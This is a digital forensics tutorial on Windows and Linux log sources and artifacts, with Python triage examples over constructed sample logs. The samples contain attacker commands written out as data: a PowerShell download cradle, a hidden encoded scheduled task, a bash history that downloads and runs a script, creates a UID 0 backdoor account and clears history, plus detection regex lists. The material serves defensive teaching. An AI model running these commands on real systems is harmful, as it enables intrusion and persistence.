
Log Sources for Digital Forensics: Windows and Linux

SOC analysts collect logs from the operating systems in their environment and analyze them to detect an attack and reconstruct its details. In this article we discuss which operating systems a SOC analyst encounters and which logs and artifacts on those systems can be examined.

Operating System Fundamentals for the Analyst

When a device is attacked, traces of the attempt are usually left on its operating system, and examining those records is a core task for the SOC analyst. A single log rarely proves on its own that an attack took place or reveals its details, but taken together with other sources it is one of the most important inputs for detecting an attack.

Place of the Operating System in the IT Infrastructure

The operating system is the system software of every device in an IT infrastructure, and an infrastructure contains a wide range of them. Network devices typically run small, purpose-built operating systems with limited processing capacity and limited logging, while servers run general-purpose operating systems with far more capacity and a correspondingly richer set of logs.

Frequently Used Operating Systems

  • Windows
  • Linux
  • Android
  • macOS
  • iOS

Windows Logs

Application Logs

Applications installed on Windows often keep their own logs outside the Windows event log (a web server's access log, a database's error log, an application's own log directory). Those logs are the source the analyst should examine for anything involving that application.

DLP (Data Loss Prevention) Logs

DLP software is security software installed to prevent data leaving the environment. It records the transfers it inspects, blocks or allows (e-mail attachments, uploads, removable media), and those logs are where the analyst looks to establish whether data was exfiltrated and what was taken.

Endpoint Security Solutions Logs

Endpoint security solutions (antivirus, EDR) are agents installed on end-user devices to protect them and to limit the impact of a breach. They can produce detailed logs when something is detected, blocked or quarantined, and EDR agents additionally record process, file, registry and network telemetry. To determine whether a compromise occurred and to see its details, the analyst should examine these logs.

Event Logs

The Windows event log is the built-in logging facility that collects records from many parts of the system. It holds many log types: the classic Application, Security and System logs, plus hundreds of per-component logs under Applications and Services Logs (for example the PowerShell, Task Scheduler, Windows Defender and WMI-Activity logs discussed below). Each event carries a numeric event ID, a timestamp, the computer name and structured EventData, and the logs can be queried with Event Viewer, wevtutil or Get-WinEvent. This is the most important log source for the security analyst, with one caveat: several useful channels and audit categories are not enabled by default, so check what was configured before concluding that an activity did not happen.

File Integrity Monitoring (FIM) Logs

File integrity monitoring software tracks changes to, and sometimes accesses of, the files it is configured to watch, typically by comparing file hashes and attributes against a baseline. To learn which files were created, modified or deleted during an attack, the analyst must examine these logs.

Honeypot Logs

Honeypots are decoy systems set up to look like real systems and attract attackers. Because the techniques used against a honeypot are often the ones an attacker would use against the production systems, its logs reveal attack vectors early and allow countermeasures to be put in place; they may therefore contain critical information. Any activity on a honeypot is suspicious by definition, since no legitimate user has a reason to touch it.

MSSQL Logs

MSSQL (Microsoft SQL Server) is Microsoft's relational database management system and is widely deployed. Its error log and, where enabled, its login auditing (failed and successful logins) should be reviewed to find unauthorized access attempts, unexpected use of dangerous features such as xp_cmdshell, and the error messages that accompany injection or brute-force attempts.

Powershell Logs

PowerShell is a cross-platform task automation solution consisting of a command-line shell, a scripting language and a configuration management framework; it runs on Windows, Linux and macOS. Attackers favor it because it is present on every Windows host, can run code directly in memory without writing a binary to disk, and has full access to .NET and the Windows APIs. PowerShell's logs must be examined to find malicious commands run on the system. With module logging and script block logging enabled, the Microsoft-Windows-PowerShell/Operational log records executed pipelines (event 4103) and the text of every script block executed (event 4104), including de-obfuscated content, which defeats most encoding tricks. Both settings are off by default and are enabled through Group Policy, so verify they were on for the period under investigation.

Task Scheduler Logs

Scheduled tasks are used in Windows to run a program at a set time or in response to an event such as logon. An intruder can create one to maintain persistence. The Microsoft-Windows-TaskScheduler/Operational log (disabled by default on recent Windows versions) records task registration and execution, the Security log records task creation as event 4698 when auditing of other object access events is enabled, and the task definitions themselves are stored as XML files under C:\Windows\System32\Tasks. The analyst should check all three while securing the system and hunting for attacks.
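The event-log, PowerShell-log and Task Scheduler sections above all come down to the same workflow: export events as XML, pull out the EventData fields, and apply a few rules. The following Python is an added example written for this article, not code from the original page or from Microsoft. It assumes the events were exported with `wevtutil qe <log> /f:xml` (which prints bare `<Event>` elements, so they are wrapped in a root element here); the three events, the host name WS01, the user jdoe and the detection heuristics are all constructed for illustration.

```python
"""Triage exported Windows events: PowerShell script blocks (4104) and scheduled-task
creation (4698). The events below are a constructed sample, not a real export."""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample: a benign 4104, a download cradle in a 4104, and a 4698
# registering a task that runs a hidden, encoded PowerShell command.
SAMPLE_EVENTS = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
  <TimeCreated SystemTime="2024-03-01T10:15:02Z"/>
  <Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>WS01</Computer></System>
 <EventData><Data Name="ScriptBlockText">Get-ChildItem C:\Temp</Data>
  <Data Name="Path">C:\scripts\inventory.ps1</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
  <TimeCreated SystemTime="2024-03-01T10:16:40Z"/>
  <Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>WS01</Computer></System>
 <EventData><Data Name="ScriptBlockText">IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')</Data>
  <Data Name="Path"></Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4698</EventID>
  <TimeCreated SystemTime="2024-03-01T10:17:05Z"/>
  <Channel>Security</Channel><Computer>WS01</Computer></System>
 <EventData><Data Name="SubjectUserName">jdoe</Data>
  <Data Name="TaskName">\Microsoft\Windows\UpdateCheck</Data>
  <Data Name="TaskContent">&lt;Task&gt;&lt;Actions&gt;&lt;Exec&gt;&lt;Command&gt;powershell.exe&lt;/Command&gt;&lt;Arguments&gt;-nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA&lt;/Arguments&gt;&lt;/Exec&gt;&lt;/Actions&gt;&lt;/Task&gt;</Data>
 </EventData></Event>
</Events>"""

# Heuristics applied to script-block text and task command lines (constructed, not exhaustive).
SUSPICIOUS = [
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"-nop\b|-noprofile\b|-w(indowstyle)?\s+hidden|executionpolicy\s+bypass", "evasion switches"),
    (r"\b(iex|invoke-expression)\b", "invoke-expression"),
    (r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", "download cradle"),
    (r"frombase64string", "base64 decode"),
]


def parse_events(xml_text):
    """Flatten each <Event> into a dict; EventData becomes {Name: text}."""
    root = ET.fromstring(xml_text)
    events = []
    for ev in root.findall("e:Event", NS):
        system = ev.find("e:System", NS)
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        events.append({
            "id": int(system.findtext("e:EventID", namespaces=NS)),
            "time": system.find("e:TimeCreated", NS).get("SystemTime"),
            "channel": system.findtext("e:Channel", namespaces=NS),
            "computer": system.findtext("e:Computer", namespaces=NS),
            "data": data,
        })
    return events


def match_rules(text):
    return [label for pattern, label in SUSPICIOUS if re.search(pattern, text, re.I)]


def triage(events):
    """Return every 4104 that matches a rule, and every 4698 (new tasks always merit a look)."""
    findings = []
    for ev in events:
        d = ev["data"]
        if ev["id"] == 4104:
            text = d.get("ScriptBlockText", "")
            hits = match_rules(text)
            if hits:
                findings.append({"time": ev["time"], "host": ev["computer"], "event": 4104,
                                 "user": None, "hits": hits, "detail": text[:120]})
        elif ev["id"] == 4698:
            # TaskContent is the task definition XML as a string; pull the command line out of it.
            cmdline = " ".join(re.findall(r"<(?:Command|Arguments)>(.*?)</", d.get("TaskContent", ""), re.S))
            findings.append({"time": ev["time"], "host": ev["computer"], "event": 4698,
                             "user": d.get("SubjectUserName"), "hits": match_rules(cmdline),
                             "detail": f'{d.get("TaskName")} -> {cmdline}'})
    return findings


if __name__ == "__main__":
    for f in triage(parse_events(SAMPLE_EVENTS)):
        print(f["time"], f["host"], f["event"], f["user"], f["hits"], f["detail"])
```

The benign script block produces no finding, the download cradle is caught by two rules, and the 4698 is reported with its creator and the decoded command line so the analyst can see at once that a task named like a Windows update check runs a hidden, base64-encoded PowerShell command. The same parser works for any channel; only the rules change per event ID.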

Windows Defender

Windows Defender is the antimalware engine built into Windows and the baseline protection against attackers and malware. Its detections, scan results, quarantine actions and configuration changes are recorded in the Microsoft-Windows-Windows Defender/Operational event log (for example event 1116 for a detection, 1117 for the action taken, 5001 when real-time protection is disabled and 5007 when the configuration changes). These entries can add important details about an attack, such as files the attacker tried to run before a detection was removed or an exclusion was added.

WMI Logs

WMI (Windows Management Instrumentation) is a technology that exposes almost every object in a Windows system for query and control, locally or remotely, and can perform a wide range of management operations. Attackers use it for reconnaissance, for lateral movement (remote process creation) and for persistence through permanent event subscriptions. If the attacker has run WMI commands on the system, the Microsoft-Windows-WMI-Activity/Operational log must be examined and evaluated; a newly registered permanent event consumer appears there as event 5861, and the subscription itself lives in the WMI repository under the root\subscription namespace.


Windows Forensics Artifacts

Autorun Items

Autorun items are the programs and scripts configured to start automatically when Windows boots or a user logs on: the Run and RunOnce registry keys, the Startup folders, services, scheduled tasks, Winlogon and shell extension entries and similar locations. Attackers use them to maintain persistence. They should be checked in every forensic examination; Sysinternals Autoruns enumerates all of these locations in one pass.

Jump Lists

Jump Lists are a Windows feature that shows the recent documents of a program pinned to the taskbar or Start menu. The data persists on disk as AutomaticDestinations and CustomDestinations files in the user's profile, so they reveal which files were opened with which application, and when, even after the files themselves are gone.

LNK Files

LNK files (Windows shortcut files) are created either deliberately by the user or automatically by Windows, in the Recent folder of the user's profile, each time a user opens a file. The operating system uses them to provide quick access to the target; for the analyst they record the target's original path, size and timestamps and the volume it was on, so they prove that a file existed and was opened even if it has since been deleted or was on removable media.

Memory

An operating system runs many processes, and every application running on the system has one or more processes in memory. Suspicious processes need to be examined to trace the attacker's actions, and memory also holds data that never reaches disk: network connections, injected code, decrypted payloads and credentials. Capture memory before a machine is shut down, because it is lost on power-off. You can check our memory analysis training for incident response.

Prefetch Files

Windows creates a prefetch file under C:\Windows\Prefetch the first time an application runs (on workstation editions; prefetching is disabled by default on Windows Server). The file stores which files the application loaded so it can start faster next time. For the analyst it records the executable's name, its run count and its most recent run times, which establishes that a program was executed even after the program itself has been deleted.

Registry

The Windows Registry is where information and settings for software, hardware devices, user preferences and the operating system configuration are stored. It holds a great deal of evidence specific to Windows: autorun entries, installed services, USB device history, user activity in the NTUSER.DAT hives (RecentDocs, UserAssist, typed paths), and the system's name and time zone, which the analyst needs to interpret every other timestamp. It is one of the must-see areas for the analyst.

Recycle Bin

Files deleted from Explorer on Windows are moved to the Recycle Bin first rather than erased. If the attacker deleted a file this way, it may be recoverable from C:\$Recycle.Bin\<user SID>\, where each deleted file is stored as an $R file holding the content and a matching $I file holding its original path, size and deletion time. Files removed from the command line, with Shift+Delete or by malware bypass the Recycle Bin entirely and must be sought through file-system forensics instead.
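The $I record is small and fixed in layout, so it is worth being able to decode it by hand when a carving tool is not available. The following Python is an added example for this article, not code from the original page; the record it decodes is constructed with the builder in the same block (path, size and deletion time are invented), and the version 1 branch covers the older Vista/7 layout for completeness.

```python
"""Decode a Recycle Bin $I metadata record. Added example with a constructed record."""
import struct
from datetime import datetime, timedelta, timezone

# On disk these live as C:\$Recycle.Bin\<SID>\$I<id>.<ext> beside $R<id>.<ext> (the content).
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME epoch


def filetime_to_datetime(ft):
    """FILETIME counts 100-nanosecond intervals since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    delta = dt - EPOCH_1601  # integer arithmetic to avoid float rounding at 1e17
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_dollar_i(data):
    """Layout: u64 version, u64 original size, u64 deletion FILETIME, then the original path.
    Version 1 (Vista/7) stores the path in a fixed 520-byte UTF-16LE field; version 2
    (Windows 10 and later) prefixes it with a u32 character count that includes the NUL."""
    version, size, ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        path = data[24:24 + 520].decode("utf-16-le").split("\x00", 1)[0]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)
        path = data[28:28 + nchars * 2].decode("utf-16-le").rstrip("\x00")
    else:
        raise ValueError(f"unsupported $I version {version}")
    return {"version": version, "original_size": size,
            "deleted_at": filetime_to_datetime(ft), "original_path": path}


def build_dollar_i(path, size, deleted_at):
    """Build a version-2 record; used here only to construct the sample below."""
    header = struct.pack("<QQQI", 2, size, datetime_to_filetime(deleted_at), len(path) + 1)
    return header + path.encode("utf-16-le") + b"\x00\x00"


def recovery_name(i_name):
    """$I0A3F2K.zip describes $R0A3F2K.zip, which holds the actual file content."""
    return "$R" + i_name[2:] if i_name.startswith("$I") else None


# Constructed sample: an archive deleted from a user profile on 2024-03-01 10:20 UTC.
SAMPLE_DELETED_AT = "2024-03-01T10:20:00+00:00"
SAMPLE_RECORD = build_dollar_i(r"C:\Users\jdoe\Documents\exfil.zip", 4096,
                               datetime.fromisoformat(SAMPLE_DELETED_AT))


def parse_sample():
    return parse_dollar_i(SAMPLE_RECORD)


if __name__ == "__main__":
    rec = parse_sample()
    print(rec["deleted_at"].isoformat(), rec["original_size"], rec["original_path"])
```

Run against a real bin, read each `$I*` file with `open(path, "rb").read()` and pass it to `parse_dollar_i`; the deletion timestamp is UTC, so convert it to the system's time zone from the registry before placing it on a timeline.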

Windows Services

Windows Services are a key component of the operating system for creating and managing long-running background processes. Because they start with the system and usually run as SYSTEM, a new or modified service is a common persistence mechanism. Compare the services under HKLM\SYSTEM\CurrentControlSet\Services with a known-good baseline, and check the System event log, where event 7045 records every newly installed service together with its binary path.

Linux Logs

Auditd Logs

The Linux Audit system (auditd) provides detailed logging of security-relevant events, written to /var/log/audit/audit.log. The system administrator configures audit rules (in /etc/audit/rules.d/ or with auditctl) that specify which system calls, file accesses and user actions are recorded, so how much the log contains depends entirely on those rules; ausearch and aureport are the tools for querying it.

Bash History

Bash history keeps a record of the commands typed in an interactive bash shell, in ~/.bash_history for each user (root's is /root/.bash_history). Recovering these commands during a forensic analysis of a Linux system can provide important information, with some caveats: the file is only written when the shell exits, it carries timestamps only if HISTTIMEFORMAT was set, and an attacker can disable it (unset HISTFILE) or wipe it (history -c), so an empty or truncated history is itself a signal. Other shells keep their own files, such as ~/.zsh_history.
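Turning a history file into a timeline means pairing each `#<epoch>` marker with the command that follows it and tolerating the stretches where no markers exist. The following Python is an added example for this article, not code from the original page; the history lines, the host 198.51.100.7 and the tagging heuristics are constructed for illustration.

```python
"""Reconstruct a tagged timeline from ~/.bash_history (constructed sample lines)."""
import re
from datetime import datetime, timezone

# Constructed history: timestamps are present for most commands (HISTTIMEFORMAT was set),
# except one line, which shows how untimestamped entries are handled.
SAMPLE_HISTORY = """\
#1709288100
wget http://198.51.100.7/x.sh -O /tmp/x.sh
#1709288110
chmod +x /tmp/x.sh && /tmp/x.sh
#1709288200
useradd -o -u 0 -g 0 backup2
#1709288230
echo '* * * * * /tmp/x.sh' | crontab -
ls -la /var/log
#1709288400
unset HISTFILE
#1709288401
history -c
"""

# Tag -> regex over the command text. Constructed heuristics, not an exhaustive list.
TAGS = {
    "download": r"\b(wget|curl)\b",
    "tmp-path": r"(^|[\s;&|])/(tmp|dev/shm|var/tmp)/\S+",
    "persistence": r"\bcrontab\b|/etc/cron|\.bashrc|systemctl\s+enable|/etc/rc\.local",
    "new-user": r"\buseradd\b|\badduser\b|\busermod\b",
    "uid-0": r"\buseradd\b.*-u\s*0\b",
    "anti-forensics": r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b|\bshred\b|rm\s+(-\w+\s+)?/var/log",
}


def parse_history(text):
    """Return entries in file order; 'time' is ISO-8601 UTC or None when no marker preceded it."""
    entries, pending_ts = [], None
    for line in text.splitlines():
        marker = re.fullmatch(r"#(\d{9,10})", line)
        if marker:                      # timestamp for the command on the next line
            pending_ts = int(marker.group(1))
            continue
        if not line.strip():
            continue
        ts = (datetime.fromtimestamp(pending_ts, tz=timezone.utc).isoformat()
              if pending_ts is not None else None)
        tags = [tag for tag, pattern in TAGS.items() if re.search(pattern, line)]
        entries.append({"time": ts, "command": line, "tags": tags})
        pending_ts = None               # a marker applies to exactly one command
    return entries


def suspicious(entries):
    return [e for e in entries if e["tags"]]


if __name__ == "__main__":
    for e in parse_history(SAMPLE_HISTORY):
        print(e["time"] or "(no timestamp)", e["tags"], e["command"])
```

The last two entries are the attacker covering tracks; note that `history -c` only clears the in-memory list, so commands already flushed to the file survive, whereas `unset HISTFILE` stops the shell from writing anything further.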

Scheduled Tasks

Scheduled tasks on Linux are managed with cron. The commands to run at set intervals are listed in the system crontab /etc/crontab, in drop-in files under /etc/cron.d/, in the /etc/cron.hourly, cron.daily, cron.weekly and cron.monthly directories, and in per-user crontabs under /var/spool/cron/ (/var/spool/cron/crontabs/ on Debian and Ubuntu). Each location should be checked for unfamiliar entries. On systemd-based systems also list systemd timers (systemctl list-timers --all) and pending at jobs, which attackers use for the same purpose.

Startup Items

Like Windows, Linux has a set of places that list the commands and programs to run when the system starts: systemd unit files under /etc/systemd/system/ and /usr/lib/systemd/system/, legacy init scripts in /etc/init.d/ and /etc/rc.local, and per-user shell startup files such as ~/.bashrc and ~/.profile, which run whenever that user opens a shell. A new entry may have been added to any of them to ensure persistence, so during the forensic analysis we should check whether one was, comparing against the package-provided originals where possible.

Recent Files

It may be possible to identify the files most recently used on a Linux system and tie them to the attack. Desktop environments record recently opened documents in ~/.local/share/recently-used.xbel, editors keep their own lists (for example ~/.viminfo), and file modification and access times can be queried directly with find -newermt or by sorting on mtime, bearing in mind that access times are often not updated on modern mounts (relatime or noatime).

User Accounts

Linux keeps account data in a few important files: /etc/passwd (accounts, UIDs, home directories and login shells), /etc/shadow (password hashes and password-change dates, readable only by root) and /etc/group. By examining them it can be seen whether the attacker created a new user, gave an existing account UID 0, added an account to a privileged group such as sudo or wheel, or set an empty password; the hashes in /etc/shadow can also be recovered for offline cracking. Check /etc/sudoers and /etc/sudoers.d/ as well, and look for keys added to ~/.ssh/authorized_keys, which grant access without touching the password files at all.
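The checks above are mechanical enough to script. The following Python is an added example for this article, not code from the original page; the passwd and shadow contents are constructed (the accounts backup2 and svc_mon and the hash placeholders are invented), and the 7-day "recently changed" window and the list of interactive shells are assumptions to tune per environment.

```python
"""Audit /etc/passwd and /etc/shadow for attacker-created or altered accounts.
Constructed file contents, not data from a real host."""
from datetime import date

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/bin/bash
jdoe:x:1000:1000:John Doe:/home/jdoe:/bin/bash
backup2:x:0:0::/home/backup2:/bin/bash
svc_mon:x:1001:1001::/home/svc_mon:/bin/bash
"""

# shadow fields: name:hash:lastchg:min:max:warn:inactive:expire:reserved
# lastchg is days since 1970-01-01; "$6$salt$hash" stands in for real SHA-512 crypt hashes.
SAMPLE_SHADOW = """\
root:$6$salt$hash:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
sync:*:19700:0:99999:7:::
www-data:*:19700:0:99999:7:::
jdoe:$6$salt$hash:19750:0:99999:7:::
backup2:$6$salt$hash:19783:0:99999:7:::
svc_mon::19783:0:99999:7:::
"""

SAMPLE_AS_OF = date(2024, 3, 1)  # the acquisition date, used to judge "recent"
INTERACTIVE = {"/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/bash", "/usr/bin/zsh"}


def parse_passwd(text):
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, uid, gid, gecos, home, shell = line.split(":")
        users[name] = {"uid": int(uid), "gid": int(gid), "gecos": gecos,
                       "home": home, "shell": shell}
    return users


def parse_shadow(text):
    out = {}
    for line in text.splitlines():
        if not line:
            continue
        f = line.split(":")
        out[f[0]] = {"hash": f[1], "lastchg": int(f[2]) if f[2] else None}
    return out


def audit(passwd_text, shadow_text, as_of, recent_days=7):
    users, shadow = parse_passwd(passwd_text), parse_shadow(shadow_text)
    today = (as_of - date(1970, 1, 1)).days
    findings = []
    for name, u in users.items():
        s = shadow.get(name, {})
        if u["uid"] == 0 and name != "root":
            findings.append((name, "UID 0 account other than root"))
        if 0 < u["uid"] < 1000 and u["shell"] in INTERACTIVE:
            findings.append((name, "system account with interactive shell"))
        if s.get("hash") == "":
            findings.append((name, "empty password field (no password required)"))
        if s.get("lastchg") is not None and today - s["lastchg"] <= recent_days:
            findings.append((name, f"password set/changed {today - s['lastchg']} days ago"))
    return findings


def audit_sample():
    return audit(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_AS_OF)


if __name__ == "__main__":
    for name, msg in audit_sample():
        print(f"{name}: {msg}")
```

The output singles out backup2 (a second UID 0 account whose password was set on the acquisition day) and svc_mon (no password at all); www-data having a login shell is reported too, because a web service account should normally have nologin and is a frequent target for web-shell to interactive-shell escalation.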

Trash

Like Windows, Linux desktop environments have a trash: files deleted from a file manager are moved to ~/.local/share/Trash/, with the content under files/ and a .trashinfo record under info/ that stores the original path and deletion date. The trash should be inspected to retrieve deleted files, bearing in mind that it is per user and per mounted volume, and that files removed with rm (which is what an attacker on a shell will use) never pass through it.

Memory

Operating systems run many processes, and every application running on the system has one or more processes in memory. Suspicious processes need to be examined to trace the attacker's actions. On a live Linux system, ps, the /proc filesystem and ss or lsof show running processes, their open files and network connections; a running executable that has been deleted from disk still appears as /proc/<pid>/exe with a (deleted) marker and can be copied out from there. A full memory image for offline analysis can be taken with a tool such as LiME.

Services

The services on a Linux system can be enumerated. Services are programs running in the background or waiting to be started, managed on most current distributions by systemd (systemctl list-units --type=service for what is running, systemctl list-unit-files for what is enabled) or by a legacy init system. In forensic analysis it is useful to check the services on the system and compare them with what the installed packages should provide, since a service with an unfamiliar name or a binary outside the usual system directories is a strong sign of persistence.

Linux System Logs

Auth Log

The log file that records successful and failed logins and other authentication events (SSH logins, sudo and su use, PAM messages, account creation) is the auth log: /var/log/auth.log on Debian and Ubuntu, /var/log/secure on Red Hat derivatives, and the journal (journalctl) on systems that run journald alone. Because attack attempts against important accounts such as root can be seen here, it has a central place in the examination of Linux systems.
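The pattern most worth detecting in this file is a burst of failures from one address followed by a success from the same address, with any account creation that follows. The following Python is an added example for this article, not code from the original page; the log lines are constructed in the classic syslog format used by auth.log and secure (the host web01, the addresses 203.0.113.5 and 192.0.2.10, and the fingerprint are invented), and the failure threshold of three is an assumption.

```python
"""Spot SSH brute force followed by a successful login, and new-account creation,
in auth.log/secure lines. The log below is a constructed sample."""
import re
from collections import defaultdict

SAMPLE_AUTH_LOG = """\
Mar  1 10:14:01 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Mar  1 10:14:03 web01 sshd[2213]: Failed password for root from 203.0.113.5 port 51240 ssh2
Mar  1 10:14:05 web01 sshd[2215]: Failed password for root from 203.0.113.5 port 51244 ssh2
Mar  1 10:14:06 web01 sshd[2217]: Failed password for root from 203.0.113.5 port 51250 ssh2
Mar  1 10:14:20 web01 sshd[2230]: Accepted password for root from 203.0.113.5 port 51290 ssh2
Mar  1 10:15:00 web01 sshd[2250]: Accepted publickey for deploy from 192.0.2.10 port 40000 ssh2: ED25519 SHA256:k3yf1ngerpr1nt
Mar  1 10:16:02 web01 sudo:     root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/useradd -o -u 0 -g 0 backup2
Mar  1 10:16:02 web01 useradd[2270]: new user: name=backup2, UID=0, GID=0, home=/home/backup2, shell=/bin/bash
"""

# "Mon dd hh:mm:ss host process[pid]: message" (the classic syslog line; no year, no zone)
LINE = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
                  r"(?P<proc>[\w.-]+)(?:\[\d+\])?: (?P<msg>.*)$")
SSH_AUTH = re.compile(r"^(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
                      r"(?P<user>\S+) from (?P<ip>[\d.:a-fA-F]+) port \d+")
NEW_USER = re.compile(r"^new user: name=(?P<user>[^,]+), UID=(?P<uid>\d+)")


def parse(text):
    """One dict per parseable line; sshd auth lines gain result/method/user/ip fields."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        auth = SSH_AUTH.match(ev["msg"]) if ev["proc"] == "sshd" else None
        if auth:
            ev.update(auth.groupdict())
        events.append(ev)
    return events


def analyze(text, threshold=3):
    failures = defaultdict(int)   # source IP -> failed logins seen so far, in log order
    findings = []
    for ev in parse(text):
        if ev.get("result") == "Failed":
            failures[ev["ip"]] += 1
        elif ev.get("result") == "Accepted":
            prior = failures.get(ev["ip"], 0)
            if prior >= threshold:
                findings.append(f'{ev["ts"]} {ev["ip"]} logged in as {ev["user"]} '
                                f'({ev["method"]}) after {prior} failures')
        elif ev["proc"] == "useradd":
            nu = NEW_USER.match(ev["msg"])
            if nu:
                note = " (root-equivalent)" if nu["uid"] == "0" else ""
                findings.append(f'{ev["ts"]} new user {nu["user"]} created with UID {nu["uid"]}{note}')
    return {"failures_by_ip": dict(failures), "findings": findings}


if __name__ == "__main__":
    result = analyze(SAMPLE_AUTH_LOG)
    print(result["failures_by_ip"])
    for f in result["findings"]:
        print(f)
```

The key-based login from 192.0.2.10 produces nothing because no failures preceded it, which keeps normal automation out of the findings. Because syslog timestamps carry no year or time zone, supply both from the image when placing these findings on a timeline; on journald-only hosts, `journalctl -u ssh -o short` yields lines in the same shape.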

Kernel Log

This is the file where the kernel's warning, information and error messages are kept: /var/log/kern.log on Debian and Ubuntu, also viewable with dmesg. It is usually examined in kernel-related error situations, but it is also where a loaded kernel module (including rootkits), an attached USB device, a program that crashed with a segmentation fault during exploitation, or an out-of-memory kill leaves its trace.

Syslog

In Linux, the log that collects general information and messages about the system is syslog: /var/log/syslog on Debian and Ubuntu, /var/log/messages on Red Hat derivatives, written by rsyslog or syslog-ng, with the systemd journal (journalctl) alongside or instead of it on current systems. It is one of the first places to look when examining a Linux system. Check the rotated copies (syslog.1, syslog.2.gz and so on) as well, and treat an unexplained gap in the timeline as possible evidence of log tampering.
